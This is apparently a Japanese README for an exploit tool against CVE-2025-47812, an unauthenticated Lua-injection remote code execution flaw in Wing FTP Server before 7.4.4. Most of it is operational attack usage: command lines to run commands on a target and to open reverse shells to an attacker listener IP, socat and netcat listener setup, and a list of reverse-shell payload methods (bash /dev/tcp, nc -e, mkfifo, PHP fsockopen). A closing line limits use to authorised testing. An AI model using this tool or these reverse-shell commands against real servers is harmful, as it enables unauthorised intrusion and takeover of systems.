
| フィールド | 値 |
|---|---|
| CVE | CVE-2025-47812 |
| 影響を受けるバージョン | Wing FTP Server < 7.4.4 |
| タイプ | 認証不要のリモートコード実行 |
| CVSS スコア | 10.0 (緊急) |
| 修正バージョン | Wing FTP Server 7.4.4 |
脆弱性は /loginok.html ログインエンドポイントに存在します。サーバーは username フィールド内の null バイト (%00) を適切にサニタイズしません。これにより、攻撃者はセッションファイルに任意の Lua コード を注入でき、そのコードは後で /dir.html などのエンドポイントにアクセスした際にサーバーサイドで評価されます — 認証は一切不要です。
参考: https://nvd.nist.gov/vuln/detail/CVE-2025-47812
--payload フラグで特定のペイロードを選択-o でコマンド出力をファイルに保存--timeout および --delay-v で詳細/デバッグモードCtrl+C の適切なハンドリングpip install requests
python3 wingftp_rce_exploit.py
# Run a command
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id"
# Save output to file
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -c "id" -o results.txt
# Reverse shell (try all payloads)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444
# Reverse shell (specific payload)
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r 10.10.15.92 -p 4444 --payload socat
-u / --url ターゲットのベース URL
-U / --username ログインユーザー名 (デフォルト: anonymous)
-c / --command 実行するコマンド (コマンドモード)
-r / --rhost あなたのリスナー IP (リバースシェルモード)
-p / --rport あなたのリスナーポート (リバースシェルモード)
--payload 使用する特定のペイロード (以下のリストを参照)
--timeout HTTP リクエストタイムアウト (秒) (デフォルト: 10)
--delay ペイロード試行間の遅延 (秒) (デフォルト: 4)
-o / --output コマンド出力をファイルに保存
-v / --verbose デバッグ出力を有効化
Target URL : http://192.168.1.10:5466
Username : anonymous
選択 : 1
Command : whoami
ステップ 1 — リスナーを起動 (完全な TTY には socat 推奨):
socat file:`tty`,raw,echo=0 tcp-listen:4444,reuseaddr
または nc の場合:
nc -lvnp 4444
ステップ 2 — エクスプロイトを実行:
python3 wingftp_rce_exploit.py -u http://TARGET:5466 -r YOUR_IP -p 4444
このツールは教育目的および許可されたセキュリティテストのみを対象としています。
自分が所有していない、または明示的な書面による許可を得ていないシステムに対しては使用しないでください。
不正使用は違法です。作者は誤用に対する一切の責任を負いません。
| 名前 | 方法 |
|---|
socat | socat 経由の完全 PTY |
bash | /dev/tcp リダイレクト |
python3 | ソケットサブプロセス |
nc-e | -e フラグ付きの Netcat |
nc-fifo | Netcat + mkfifo |
php | PHP fsockopen |